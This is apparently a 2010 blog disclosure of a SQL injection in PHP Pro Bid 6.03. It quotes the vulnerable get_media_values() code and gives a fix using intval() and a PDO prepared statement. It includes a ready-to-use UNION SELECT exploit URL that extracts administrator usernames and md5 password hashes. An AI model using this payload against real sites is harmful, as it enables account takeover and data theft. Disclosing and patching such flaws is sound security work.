Friday, January 22, 2010

[Original] PHP Pro Bid 6.03 SQL Injection

Version: PHP Pro Bid 6.03

An old PHP auction application; the latest version at the time of writing is 6.06. Straight to the code:

auction_details.php:
    $template->set('msg_changes_saved', $msg_changes_saved);
    $item_details['quantity'] = $item->set_quantity($item_details['quantity']);
    $custom_fld->save_edit_vars($item_details['owner_id'], $page_handle);
    $media_details = $item->get_media_values($_REQUEST['auction_id']); // not filtered
    $item_details['ad_image'] = $media_details['ad_image'];
    $item_details['ad_video'] = $media_details['ad_video'];
    $template->set('item_details', $item_details);
    $template->set('buyout_only', $item->buyout_only($item_details));

includes/class_item.php:
    function get_media_values($auction_id, $wanted_ad = false)
    {
        $output = array('auction_id' => $auction_id, 'ad_image' => null, 'ad_video' => null);
        (int) $counter_image = 0;
        (int) $counter_video = 0;

        $field_type = ($wanted_ad) ? 'wanted_ad_id' : 'auction_id';

        // This is the injection point: $auction_id is concatenated straight into the query.
        // Since the result is echoed back as an image path, media_type must be 1.
        $sql_select_media = $this->query("SELECT media_url, media_type FROM " . DB_PREFIX . "auction_media WHERE
            " . $field_type . "=" . $auction_id . " AND upload_in_progress=0 ORDER BY media_id ASC");
        while ($media_details = $this->fetch_array($sql_select_media))
        {
            if ($media_details['media_type'] == 1) // 1 = image
            {
                $output['ad_image'][$counter_image++] = $media_details['media_url'];
            }
            else if ($media_details['media_type'] == 2) // 2 = video
            {
                $output['ad_video'][$counter_video++] = $media_details['media_url'];
            }
        }
        return $output;
    }

Exploitation:
auction_details.php?name=ItemName&auction_id=ItemID and 1=2 union select concat(username,0x3a,password,0x3a),1 from probid_admins--

The page then renders a broken image whose src path contains the administrator's username and password.


Oddly, this system stores administrator passwords as a plain md5 hash, while member passwords are stored as md5(md5($password) . $salt). Hard to understand why.


Fix:
auction_details.php
    $media_details = $item->get_media_values($_REQUEST['auction_id']);

Change to
    $media_details = $item->get_media_values(intval($_REQUEST['auction_id']));
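As an added example (not PHP Pro Bid's own code), the same fix carried one step further: the auction id is validated before the query, the column name comes from a fixed whitelist, and the id is bound through a PDO prepared statement rather than concatenated. The table and column names follow the vulnerable query above; the in-memory SQLite database and its rows are constructed so the script runs offline.

```php
<?php
// Added example, not PHP Pro Bid's own code: a hardened get_media_values()
// that validates auction_id, whitelists the column name and binds the id with
// a PDO prepared statement. Table and column names follow the vulnerable query;
// the in-memory SQLite database and its rows are constructed for this demo.
define('DB_PREFIX', 'probid_');

function validate_auction_id($raw): int
{
    // Only a plain positive integer passes; "5 and 1=2 union select ..."
    // is rejected here instead of being concatenated into SQL.
    if (!is_scalar($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', (string) $raw)) {
        throw new InvalidArgumentException('auction_id must be a positive integer');
    }
    return (int) $raw;
}

function get_media_values(PDO $db, $auction_id, bool $wanted_ad = false): array
{
    $id = validate_auction_id($auction_id);
    $field_type = $wanted_ad ? 'wanted_ad_id' : 'auction_id'; // fixed whitelist
    $output = ['auction_id' => $id, 'ad_image' => null, 'ad_video' => null];

    // The id is a bound parameter, so it cannot change the query structure.
    $stmt = $db->prepare('SELECT media_url, media_type FROM ' . DB_PREFIX . 'auction_media'
        . ' WHERE ' . $field_type . ' = :id AND upload_in_progress = 0 ORDER BY media_id ASC');
    $stmt->execute([':id' => $id]);
    while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
        if ((int) $row['media_type'] === 1) {       // 1 = image
            $output['ad_image'][] = $row['media_url'];
        } elseif ((int) $row['media_type'] === 2) { // 2 = video
            $output['ad_video'][] = $row['media_url'];
        }
    }
    return $output;
}

// Constructed sample data (SQLite in memory, so the script runs offline).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE probid_auction_media (media_id INTEGER PRIMARY KEY, auction_id INTEGER,
    wanted_ad_id INTEGER, media_url TEXT, media_type INTEGER, upload_in_progress INTEGER)');
$db->exec("INSERT INTO probid_auction_media VALUES (1, 5, NULL, 'img/a.jpg', 1, 0),
    (2, 5, NULL, 'vid/a.mp4', 2, 0), (3, 5, NULL, 'img/b.jpg', 1, 1)");

print_r(get_media_values($db, '5'));  // a valid id: the finished image and video
try {
    get_media_values($db, '5 and 1=2 union select 1,1 from probid_admins--');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}
```

The row with upload_in_progress=1 is still excluded by the query, so behaviour for legitimate ids matches the original function while the injected string never reaches the database.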
